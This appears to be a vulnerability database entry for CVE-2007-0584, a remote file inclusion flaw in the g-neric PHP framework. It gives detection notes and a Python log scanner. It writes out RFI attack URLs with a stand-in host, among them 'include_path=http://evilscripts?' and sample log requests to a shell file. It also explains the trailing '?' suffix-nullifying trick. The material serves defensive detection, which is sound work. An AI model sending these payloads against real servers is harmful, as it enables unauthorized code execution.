cbcvebase.
CVE-2007-0584
published 2007-01-30


Priority: P356 · high · 7.5 (CVSS 2.0)
CVSS vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 69.95% (99.3th percentile)
PHP remote file inclusion vulnerability in membres/membreManager.php in PhP Generic Library & Framework for comm (g-neric) allows remote attackers to execute arbitrary PHP code via a URL in the include_path parameter.

Detection & IOCs (extracted from sources)

path: membres/membreManager.php
command: membres/membreManager.php?include_path=http://evilscripts?
  • Detect HTTP requests targeting membreManager.php with a URL-based value in the include_path parameter, indicating a remote file inclusion attempt.
  • Monitor for $GLOBALS[include_path] being set to a remote URL, which triggers inclusion of attacker-controlled PHP files (configmember.php, inc-membreManager.php).
  • The RFI payload URL must be terminated with a '?' character to nullify the appended filename suffix (e.g., configmember.php), allowing the attacker's script to load cleanly.
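
The first and third detection notes above can be applied to web server access logs as follows. This is an added example, not code from the advisory or from the g-neric project; it assumes common/combined log format, and the function names, sample log lines, addresses and hosts are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Value that begins with a URL scheme, i.e. a remote location, not a local path.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)

def php_param_name(name):
    # PHP strips leading spaces and maps '.' and ' ' to '_' in request parameter names.
    return name.lstrip(" ").replace(".", "_").replace(" ", "_")

def check_line(line):
    """Return a finding dict for a CVE-2007-0584 style request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Decode the path so a percent-encoded script name still matches.
    if not unquote(parts.path).lower().endswith("/membremanager.php"):
        return None
    # parse_qsl percent-decodes names and values before they are inspected.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if php_param_name(name) == "include_path" and REMOTE_RE.match(value):
            return {
                "client": line.split(" ", 1)[0],
                "value": value,
                # Trailing '?' is the suffix-nullifying marker the notes describe.
                "trailing_qmark": value.rstrip().endswith("?"),
            }
    return None

def scan(lines):
    """Return the findings for every matching line, in input order."""
    return [f for f in map(check_line, lines) if f]

# Constructed sample log lines (documentation addresses and .invalid hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jan/2007:10:00:00 +0000] "GET /membres/membreManager.php?include_path=lib/ HTTP/1.1" 200 512',
    '198.51.100.7 - - [30/Jan/2007:10:00:05 +0000] "GET /membres/membreManager.php?include_path=http://example.invalid/shell.txt? HTTP/1.1" 200 90',
    '198.51.100.7 - - [30/Jan/2007:10:00:09 +0000] "GET /g-neric/membres/membreManager.php?include_path=http%3A%2F%2Fexample.invalid%2Fa.txt HTTP/1.1" 200 90',
    '192.0.2.44 - - [30/Jan/2007:10:01:00 +0000] "GET /index.php?url=http://example.invalid/ HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs normally record only the query string, so a value supplied in a POST body or cookie would need request-body logging or a WAF rule to catch.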